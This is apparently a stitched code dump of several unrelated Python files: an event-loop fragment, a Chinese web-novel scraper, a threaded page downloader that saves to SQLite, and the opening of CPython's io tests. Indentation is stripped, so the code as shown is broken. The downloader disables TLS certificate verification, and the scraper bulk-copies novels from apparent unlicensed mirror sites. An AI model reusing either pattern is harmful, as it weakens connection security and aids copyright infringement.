# Calculate remaining timeout. (The inputhook consumed some of the time.)
if current_timeout[0] is None:
remaining_timeout = None
else:
remaining_timeout = max(0, current_timeout[0] - inputhook_duration)
# Wait until input is ready.
fds = self._ready_for_reading(remaining_timeout)
# When any of the FDs are ready. Call the appropriate callback.
if fds:
# Create lists of high/low priority tasks. The main reason
# for this is to allow painting the UI to happen as soon as
# possible, but when there are many events happening, we
# don't want to call the UI renderer 1000x per second. If
# the eventloop is completely saturated with many CPU
# intensive tasks (like processing input/output), we say
# that drawing the UI can be postponed a little, to make
# CPU available. This will be a low priority task in that
# case.
tasks = []
low_priority_tasks = []
now = None # Lazy load time. (Fewer system calls.)
for fd in fds:
# For the 'call_from_executor' fd, put each pending
# item on either the high or low priority queue.
if fd == self._schedule_pipe[0]:
for c, max_postpone_until in self._calls_from_executor:
if max_postpone_until is None:
# Execute now.
tasks.append(c)
else:
# Execute soon, if `max_postpone_until` is in the future.
now = now or _now()
if max_postpone_until < now:
tasks.append(c)
else:
low_priority_tasks.append((c, max_postpone_until))
self._calls_from_executor = []
# Flush all the pipe content.
os.read(self._schedule_pipe[0], 1024)
else:
handler = self._read_fds.get(fd)
if handler:
tasks.append(handler)
# Handle everything in random order. (To avoid starvation.)
random.shuffle(tasks)
random.shuffle(low_priority_tasks)
# When there are high priority tasks, run all these.
# Schedule low priority tasks for the next iteration.
if tasks:
for t in tasks:
t()
# Postpone low priority tasks.
for t, max_postpone_until in low_priority_tasks:
self.call_from_executor(t, _max_postpone_until=max_postpone_until)
else:
# Currently there are only low priority tasks -> run them right now.
for t, _ in low_priority_tasks:
t()
else:
# Flush all pending keys on a timeout. (This is most
# important to flush the vt100 'Escape' key early when
# nothing else follows.)
inputstream.flush()
# Fire input timeout event.
callbacks.input_timeout()
current_timeout[0] = None
self.remove_reader(stdin)
self.remove_reader(self._schedule_pipe[0])
self._callbacks = None
def _ready_for_reading(self, timeout=None):
"""
Return the file descriptors that are ready for reading.
"""
fds = self.selector.select(timeout)
return fds
def received_winch(self):
"""
Notify the event loop that SIGWINCH has been received
"""
# Process signal asynchronously, because this handler can write to the
# output, and doing this inside the signal handler causes easily
# reentrant calls, giving runtime errors..
# Furthur, this has to be thread safe. When the CommandLineInterface
# runs not in the main thread, this function still has to be called
# from the main thread. (The only place where we can install signal
# handlers.)
def process_winch():
if self._callbacks:
self._callbacks.terminal_size_changed()
self.call_from_executor(process_winch)
def run_in_executor(self, callback):
"""
Run a long running function in a background thread.
(This is recommended for code that could block the event loop.)
Similar to Twisted's ``deferToThread``.
"""
# Wait until the main thread is idle.
# We start the thread by using `call_from_executor`. The event loop
# favours processing input over `calls_from_executor`, so the thread
# will not start until there is no more input to process and the main
# thread becomes idle for an instant. This is good, because Python
# threading favours CPU over I/O -- an autocompletion thread in the
# background would cause a significantly slow down of the main thread.
# It is mostly noticable when pasting large portions of text while
# having real time autocompletion while typing on.
def start_executor():
threading.Thread(target=callback).start()
self.call_from_executor(start_executor)
def call_from_executor(self, callback, _max_postpone_until=None):
"""
Call this function in the main event loop.
Similar to Twisted's ``callFromThread``.
:param _max_postpone_until: `None` or `time.time` value. For interal
use. If the eventloop is saturated, consider this task to be low
priority and postpone maximum until this timestamp. (For instance,
repaint is done using low priority.)
"""
assert _max_postpone_until is None or isinstance(_max_postpone_until, float)
self._calls_from_executor.append((callback, _max_postpone_until))
if self._schedule_pipe:
try:
os.write(self._schedule_pipe[1], b'x')
except (AttributeError, IndexError, OSError):
# Handle race condition. We're in a different thread.
# - `_schedule_pipe` could have become None in the meantime.
# - We catch `OSError` (actually BrokenPipeError), because the
# main thread could have closed the pipe already.
pass
def stop(self):
"""
Stop the event loop.
"""
self._running = False
def close(self):
self.closed = True
# Close pipes.
schedule_pipe = self._schedule_pipe
self._schedule_pipe = None
if schedule_pipe:
os.close(schedule_pipe[0])
os.close(schedule_pipe[1])
if self._inputhook_context:
self._inputhook_context.close()
def add_reader(self, fd, callback):
" Add read file descriptor to the event loop. "
fd = fd_to_int(fd)
self._read_fds[fd] = callback
self.selector.register(fd)
def remove_reader(self, fd):
" Remove read file descriptor from the event loop. "
fd = fd_to_int(fd)
if fd in self._read_fds:
del self._read_fds[fd]
self.selector.unregister(fd)
class call_on_sigwinch(object):
"""
Context manager which Installs a SIGWINCH callback.
(This signal occurs when the terminal size changes.)
"""
def __init__(self, callback):
self.callback = callback
self.previous_callback = None
def __enter__(self):
self.previous_callback = signal.signal(signal.SIGWINCH, lambda *a: self.callback())
def __exit__(self, *a, **kw):
if self.previous_callback is None:
# Normally, `signal.signal` should never return `None`.
# For some reason it happens here:
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/174
signal.signal(signal.SIGWINCH, 0)
else:
signal.signal(signal.SIGWINCH, self.previous_callback)
|
main.py
|
# coding:utf-8
from distutils import archive_util
import sys
import requests
from bs4 import BeautifulSoup
import multiprocessing
import re
import os
import time
from config import Config, Host, OutputDir
from utils import getWebHost, removeN, trim
# 通过章节的url下载内容,并返回下一页的url
def get_ChartTxt(baseUrl, url, title, num, totalNum, encoding):
# print('本章节地址: ' + url, encoding)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
res = requests.get(url, headers=headers) # get方法中加入请求头
# 查看下当前requests请求url抓去的数据编码,这里获取的是ISO-8859-1
# print("原址编码:%s" % (requests.get(url).encoding))
# 翻阅下要爬去的网站的编码是什么,这里看了下是utf-8,编码不一样会乱码,将requests获取的数据编码改为和目标网站相同,改为utf-8
# res.encoding = 'utf-8'
# res.encoding = 'gbk'
res.encoding = encoding
soup = BeautifulSoup(res.text, 'html.parser') # 对返回的结果进行解析
# 查找章节名
# <div class="bookname">
# <h1>第1章 大康王朝</h1>
# ...
# </div>
chapterTile = soup.select(Config[baseUrl]['chapterTile'])[0].get_text()
# [<h1>第1章 大康王朝</h1>]
chapterTile = chapterTile.strip()
numLength = len(str(totalNum))
# # n = "123"
# # s = n.zfill(5)
# # assert s == '00123'
numStr = str(num)
numStr = numStr.zfill(numLength)
print('正在下载 (%s/%s) %s %s' % (numStr, totalNum, chapterTile, url))
# 开始计时
start = time.time()
# # 判断是否有感言
# if re.search(r'.*?章', chapterTile) is None:
# return
chapterTile = re.sub(r'\?', '_', chapterTile)
chapterTile = re.sub(r'\/', '_', chapterTile)
# 获取章节文本
content = soup.select(Config[baseUrl]['chapterContent'])[0].text
# 按照指定格式替换章节内容,运用正则表达式
content = re.sub(r'\(.*?\)', '', content)
content = re.sub(r'\r\n', '\n', content)
content = re.sub(r'\n+', '\n', content)
content = re.sub(r'<.*?>+', '\n', content)
content = re.sub(r' +', ' ', content)
ads = Config[baseUrl]['ads']
if(len(ads) > 0):
for ad in ads:
content = re.sub(r'%s' % (ad), ' ', content)
# 单独写入这一章
try:
with open(r'.\%s\%s\%s %s.txt' % (OutputDir, title, numStr, chapterTile), 'w', encoding='utf-8') as f:
# print(content)
f.write(chapterTile + '\n' + content)
f.close()
end = time.time()
print('下载 %s %s 完成,运行时间 %0.2f s.' % (num, chapterTile, (end - start)))
except Exception as e:
print(e)
print(chapterTile, '下载失败', url)
errorPath = '.\Error\%s' % (title)
# 创建错误文件夹
try:
os.makedirs(errorPath)
except Exception as e:
pass
# 写入错误文件
with open("%s\error_url.txt" % (errorPath), 'a', encoding='utf-8') as f:
f.write(chapterTile+"下载失败 "+url+'\n')
f.close()
return
# 章节合并
def mergeFiles(title, encoding):
dirPath = r".\%s\%s" % (OutputDir, title) # 所有txt位于的文件夹路径
files = os.listdir(dirPath)
res = ""
encoding = 'utf-8'
i = 0
for file in files:
if file.endswith(".txt"):
i += 1
fileName = dirPath + "/" + file
print(fileName)
with open(fileName, "r", encoding=encoding) as file:
content = file.read()
file.close()
append = "\n\n%s" % (content)
res += append
bookPath = r"%s\\%s.txt" % (dirPath, title) # 文件路径
if os.path.exists(bookPath): # 如果文件存在
# 删除文件,可使用以下两种方法。
os.remove(bookPath)
# os.unlink(path)
with open(bookPath, "w", encoding=encoding) as outFile:
outFile.write(res)
outFile.close()
print('整书《%s》合并完成,总字数:%d' % (title, len(res)))
return
# 通过首页获得该小说的所有章节链接后下载这本书
def thread_getOneBook(url, encoding):
# url = 'http://www.cnplugins.com/'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
res = requests.get(url, headers=headers) # get方法中加入请求头
if(encoding.isspace()):
res.encoding = requests.get(url).encoding
else:
res.encoding = encoding
html = res.text
soup = BeautifulSoup(html, 'html.parser') # 对返回的结果进行解析
# 先检查下网页编码
# <meta http-equiv="Content-Type" content="text/html; charset=gbk">
# <meta charset="utf-8">
rmetaCharset = [
r'meta http-equiv="Content-Type" content="text/html; charset=(.*)"',
r'meta charset="(.*)"'
]
encoding1 = 'gbk'
for r in rmetaCharset:
regular = re.compile(r)
encodingContent = re.findall(regular, html)
if(encodingContent != None and len(encodingContent) > 0):
encoding1 = encodingContent[0]
break
if(encoding1 != encoding):
thread_getOneBook(url, encoding1)
return
print('小说首页地址: ' + url)
print("原址编码:%s" % (encoding))
# baseUrl = ''
# try:
# # 提取出书的每章节不变的url
# regular = re.compile(Host)
# baseUrl = re.findall(regular, url)[0]
# except Exception as e:
# baseUrl = getWebHost(url)
baseUrl = getWebHost(url)
# print(baseUrl)
# return
if(baseUrl.strip() == ''):
print('未正确匹配出根域名地址')
return
bookNameCss = Config[baseUrl]['bookName'].strip()
if(bookNameCss == ''):
# 查找小书名
# <meta property="og:novel:book_name" content="天命王侯">
# meta property="og:novel:book_name" content="(.*?)"
title = soup.find(attrs={"property": "og:novel:book_name"})['content']
else:
title = soup.select(bookNameCss)[0].get_text()
title = title.strip()
print('正在下载 《%s》' % (title))
# 开始计时
start = time.time()
# 根据书名创建文件夹
if OutputDir not in os.listdir('.'):
os.mkdir(r".\%s" % (OutputDir))
if title not in os.listdir(r'.\%s' % (OutputDir)):
os.mkdir(r".\%s\%s" % (OutputDir, title))
print(title, "文件夹创建成功")
# 获取这本书的所有章节
charts_url = []
url_chartTitle = dict()
print('顶级域名:%s' % (baseUrl))
index = 0
# print (soup.select('body > section > div.wrapbox > div:nth-child(1) > div > ul > li:nth-child(6)'))
# nth-child 在python中运行会报错,需改为 nth-of-type
# print (soup.select('body > section > div.wrapbox > div:nth-of-type(1) > div > ul > li:nth-of-type(6)'))
# textlist = soup.select('#list a')
textlist = soup.select(Config[baseUrl]['menuList'])
for t in textlist:
# print(type(t))
# <a href="/book/10258/53450024.html">
# 第475章 五百人足矣
# </a>
# print (t) #获取单条html信息
try:
chart_title = trim(removeN(t.get_text()))
chart_url = t['href']
if(chart_url.strip() == ''):
print('章节url未找到')
continue
# # 判断是否有感言
# if re.findall(r'.*?章', chart_title) is None:
# print('抓到作者感言,跳过...')
# continue
url_chartTitle[chart_url] = chart_title
if chart_url in charts_url:
charts_url.remove(chart_url) # 移除之前已有的重复项
charts_url.append(chart_url)
else:
index += 1
charts_url.append(chart_url)
# print('%d %s %s' % (index, chart_title, chart_url)) # 获取中间文字信息
except Exception as e:
print('[ERROR] ' + str(e))
continue
totalNum = len(charts_url)
print('总共找到 %d 章' % (totalNum))
# 创建下载这本书的进程
p = multiprocessing.Pool()
# 自己在下载的文件前加上编号,防止有的文章有上,中,下三卷导致有3个第一章
num = 1
for i in charts_url:
if(False == Config[baseUrl]['menuUrlIsFull']): # 目录url是相对于根域名
baseUrl1 = baseUrl
if (baseUrl.endswith('/') and i.startswith('/')):
baseUrl1 = baseUrl.rstrip('/')
url = baseUrl1+i
else: # 目录url是全路径
url = i
p.apply_async(get_ChartTxt, args=(
baseUrl, url, title, num, totalNum, encoding))
num += 1
# 测试用
# if(num >= 10):
# break
print('等待 %s 所有的章节被加载......' % (title))
p.close()
p.join()
end = time.time()
print('下载 %s 完成,运行时间 %0.2f s.' % (title, (end - start)))
print('开始生成 %s ................' % title)
# sort_allCharts(r'.',"%s.txt"%title)
mergeFiles(title, encoding)
return
# 创建下载多本书书的进程
def process_getAllBook(urls):
# 输入你要下载的书的首页地址
print('主程序的PID:%s' % os.getpid())
print("-------------------开始下载-------------------")
p = []
for i in urls:
p.append(multiprocessing.Process(
target=thread_getOneBook, args=(i, 'utf-8')))
print("等待所有的主进程加载完成........")
for i in p:
i.start()
for i in p:
i.join()
print("-------------------全部下载完成-------------------")
return
urls = [
# 'http://www.26ksw.cc/book/10258/',
# 'http://www.biquge001.com/Book/17/17605/',
# 'http://www.biquge001.com/Book/17/17605/',
# 'http://www.biquge001.com/Book/8/8460/',
# 'https://www.xbiquge.la/7/7877/',
# 'http://www.ibiqu.net/book/7/',
# 'https://www.biquge.biz/22_22780/',
# 'https://www.biqugee.com/book/1366/',
# 'https://www.bige7.com/book/11742/'
# 'http://www.b5200.net/50_50537/',
# 'https://biquge96.com/30_30171/',
# 'http://www.b5200.net/52_52542/',
# 'https://www.bige7.com/book/2749/',
# 'http://www.soduso.cc/novel/57634/',
# 'http://www.soduso.cc/novel/57634/'
# 'http://www.biquge001.com/Book/2/2321/'
# 'https://www.xbiquge.la/0/745/'
# 'http://www.biquge001.com/Book/18/18632/'
'http://www.399xs.com/book/0/611/'
# 'https://www.yousheng8.com/yousheng/704/'
]
# 原址编码:gbk" src="https://www.baidu.com/js/opensug.js
if __name__ == "__main__":
argvNum = len(sys.argv)
if(argvNum >= 2): # 参数1是本文件名 参数2为小说目录页地址
print('参数个数为:', argvNum, '个参数。')
print('参数列表:', str(sys.argv))
urls = [
sys.argv[1]
]
# 下载指定的书
process_getAllBook(urls) # 如果下载完出现卡的话,请单独执行如下命令
# sort_allCharts(r'.\龙血战神',"龙血战神.txt")
# mergeFiles('明朝败家子', 'gbk')
# get_ChartTxt('https://biquge96.com/','https://biquge96.com/30_30171/17240253.html', '重生之金融巨头', 1, 1, 'utf-8')
|
LD.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# Author : 'Victor'
# E-mail : linxianwusx@gmail.com
# Date : '2015/10/11'
# Version : 0.3
#
import Queue
import ConfigParser
import os
import requests
import threading
import cchardet
import re
import sqlite3 as sq
import time
import jsonpickle
NUM = 0
mutex = threading.Lock()
requests.packages.urllib3.disable_warnings() # Not show requests error messages
def monkey_patch():
#requests库补丁
#http://www.sdc1992.com/2015/04/08/Python-Requests抓取网页时编码错误的解决方案/
prop = requests.models.Response.content
def content(self):
_content = prop.fget(self)
if self.encoding == 'ISO-8859-1' or not self.encoding :
encodings = requests.utils.get_encodings_from_content(_content)
if encodings:
self.encoding = encodings[0]
else:
# self.encoding = self.apparent_encoding
self.encoding = cchardet.detect(_content)['encoding']
#_content = _content.decode(self.encoding, 'replace').encode('utf8', 'replace') 这个地方不能加这句话
#返回的content是ascii码,根据返回的ascii码和response.encoding来处理字符串
self._content = _content
return _content
requests.models.Response.content = property(content)
monkey_patch()
class Item(object):
html = ""
website = ""
name = ""
time = ""
def __init__(self, name, website):
self.website = website
self.name = name
self.time = self.getTime()
def setHtml(self, html):
self.html = html
@staticmethod
def getTime():
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
class Downloader(object):
def __init__(self, name, timeOut, urlList, downloadedNum, queue, mutLine, proxy):
self.queue = queue
self.name = name
self.timeOut = timeOut
self.downloadedNum = downloadedNum
self.urlList = urlList
self.threadList = []
self.mutLine = mutLine
self.proxy = proxy
def getItem(self):
""" use UrlList to distribute tasks and remove tasks url from UrlList """
global NUM
global mutex
mutex.acquire()
if self.urlList:
url = self.urlList.pop(0)
NUM += 1
mutex.release()
return [str(NUM + self.downloadedNum), url]
else:
mutex.release()
return None
def getHtml(self, url, timeOut):
try:
proxies = {}
if self.proxy is not None:
proxies = {
"http": self.proxy,
"https": self.proxy,
}
user_agent = {
'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER'}
response = requests.get(
url, timeout=timeOut, headers=user_agent, proxies=proxies, verify=False)
if response.status_code == requests.codes.ok:
return response.content.decode(response.encoding,'ignore').encode("utf-8")
else:
response.raise_for_status()
#raise Exception("HttpError", "Not response ok code !")
except Exception as e:
return e
def download(self):
while True:
retry = 0
temp = self.getItem()
if not temp:
break # if there are none new item, stop download
item = Item(temp[0], temp[1])
html = self.getHtml(item.website, self.timeOut)
# if download html some error, retry
while not isinstance(html, str):
print item.name, "\tRetry: " + str(html) # 如果出错,html为出错信息
retry += 1
html = self.getHtml(item.website, self.timeOut)
# if retry 3 times, if will finished download and set html =
# "None"
if retry >= 2 and (not isinstance(html, str)):
html = "None"
item.setHtml(html)
self.queue.put(jsonpickle.encode(item))
global mutex
mutex.acquire()
if html != "None":
print item.name, "\tDone"
else:
print item.name, "\tError"
mutex.release()
# print "Thread finished"
def run(self):
for i in xrange(self.mutLine):
self.threadList.append(threading.Thread(target=self.download))
for i in xrange(self.mutLine):
self.threadList[i].start()
def join(self):
for i in xrange(self.mutLine):
self.threadList[i].join()
class InsertDB(object):
def __init__(self, queue, name):
self.isWork = 1
self.name = name
self.queue = queue
self.cx = sq.connect(self.name + ".db", check_same_thread=False)
self.cx.text_factory = str
self.cu = self.cx.cursor()
def run(self):
self.insertDB = threading.Thread(target=self.insertDb)
self.insertDB.start()
def getItemList(self):
itemList = []
num = 50 # Default once get 50 items.
while self.queue.qsize() < num: # wait for the queue enough 50 items.
if self.isWork == 1:
time.sleep(1)
else: # if downloader is finish, get queue size as new num value
num = self.queue.qsize()
for i in xrange(num):
item = self.queue.get()
itemList.append(self.item2List(item))
return itemList
@staticmethod
def item2List(itemJson):
item = jsonpickle.decode(itemJson)
list1 = [item.time, item.website, item.html]
return list1
def insertDb(self):
while True:
itemList = self.getItemList()
for i in itemList:
# i:item.time, item.website, item.html
# there should judge is newly added or failed to download
self.cu.execute(
"SELECT count(id) FROM main WHERE website = ?", (i[1],))
item = self.cu.fetchone()
if item[0] == 0: # new one
try:
self.cu.execute(
"INSERT INTO main(time, website, html) VALUES(?,?,?)", i)
except Exception as e:
print i
else: # failed and downloaded
self.cu.execute(
"UPDATE main SET html = ? WHERE website = ?", (i[2], i[1]))
self.cx.commit()
if self.isWork == 0:
self.cu.close()
self.cx.close()
break
if len(itemList) == 0:
break
def join(self):
self.isWork = 0
self.insertDB.join()
class ListDownloader(object):
def __init__(self, configPath):
cf = ConfigParser.ConfigParser()
cf.read(configPath)
self.name = cf.get('LD', "Name")
self.proxy = cf.get('LD', "Proxy")
self.mutLine = cf.getint("LD", "MutLine")
self.timeOut = cf.getint("LD", "timeOut")
self.queue = Queue.Queue()
self.downloadedNum = 0
self.urlList = []
print "READ CONFIG OK".center(30, "*")
def createDB(self): # create database
cx = sq.connect(self.name + ".db")
cu = cx.cursor()
sql = "CREATE TABLE main(id INTEGER PRIMARY KEY AUTOINCREMENT, time TEXT,website BLOB, html BLOB);"
cu.execute(sql)
cu.close()
cx.close()
print "CREATE DATABASE OK".center(30, "*")
def getDownloadUrlList(self):
# 读取下载列表
originUrl = []
with open(self.name + "_url.txt") as f:
for line in f.readlines():
originUrl.append(line.strip("\n").decode("utf-8"))
# 读取数据库下载列表
cx = sq.connect(self.name + ".db")
cu = cx.cursor()
sql = "SELECT website FROM main;"
cu.execute(sql)
downloadedUrl = []
for i in cu.fetchall():
downloadedUrl.append(i[0])
# 读取下载失败列表
sql = "SELECT website FROM main WHERE html='None';"
cu.execute(sql)
errorUrl = []
for i in cu.fetchall():
errorUrl.append(i[0])
cx.close()
# 做差计算未下载列表
url = [i for i in originUrl if i not in downloadedUrl]
url.extend(errorUrl)
print "LOAD DOWNLOAD LIST OK".center(30, "*")
print "ALL\tNEED\tERROR"
print str(len(originUrl)) + "\t" + str(len(url)) + "\t" + str(len(errorUrl))
return [len(downloadedUrl) - len(errorUrl), url]
def run(self):
if not os.path.exists(self.name + ".db"): # if there are no database file, than create one.
self.createDB()
else:
print "FIND DATABASE OK".center(30, "*")
self.downloadedNum, self.urlList = self.getDownloadUrlList()
print "START DOWNLOAD".center(30, "*")
downloader = Downloader(
name = self.name,
urlList = self.urlList,
downloadedNum = self.downloadedNum,
timeOut = self.timeOut,
queue = self.queue,
mutLine = self.mutLine,
proxy = self.proxy
)
downloader.run()
insertDB = InsertDB(self.queue, self.name)
insertDB.run()
downloader.join()
insertDB.join()
if __name__ == "__main__":
import sys
ListDownloader(sys.argv[1]).run()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def byteslike(*pos, **kw):
return memoryview(bytearray(*pos, **kw))
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data.tobytes(), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
bytes_fn = fn_with_NUL.encode('ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(TypeError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
